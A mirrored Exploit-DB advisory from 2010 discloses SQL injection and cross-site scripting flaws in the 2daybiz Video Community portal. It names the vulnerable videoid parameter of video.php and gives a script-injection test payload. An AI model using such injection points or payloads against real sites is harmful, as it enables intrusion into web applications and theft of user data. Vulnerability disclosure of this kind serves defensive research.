- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13970
- Проверка EDB
-
- Пройдено
- Автор
- L0RD CRUSAD3R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2010-2459 cve-2010-2458
- Дата публикации
- 2010-06-22
Код:
1 ########################################## 1
0 I'm L0rd CrusAd3r member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
Author: L0rd CrusAd3r aka VSN [[email protected]]
Exploit Title:Video Community portal SQLi and XSS Vulnerable
Vendor url:http://www.2daybiz.com/
Version:1
Price:120$
Published: 2010-06-22
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, M4n0j, Sonic Bluehat.
Special Greetz: Topsecure.net, inj3ct0r Team , Andhrahackers.com
Shoutzz:- To all ICW members.
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Description:
2daybiz Video Community portal is the ultimate solution for starting your video sharing and uploading community similar to YouTube, Daily Motion and Myspace Videos. This enterprise level video sharing software offers a powerful and rich featured solution. In this software members can upload videos, rate videos, tag videos, leave comments, edit uploaded videos, title and description set video as public/private, video play list, create channels, groups and favorite videos.
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Vulnerability:
*SQLi Vulnerable
DEMO URL:
http://www.site.com/products/videocommunity/video.php?videoid=[sqli]
*XSS Vulnerable
Parameter:'"--><script>alert(0x000872)</script>
DEMO URL:
http://www.site.com/products/videocommunity/video.php?videoid=[xss]
# 0day n0 m0re #
# L0rd CrusAd3r #- Источник
- www.exploit-db.com
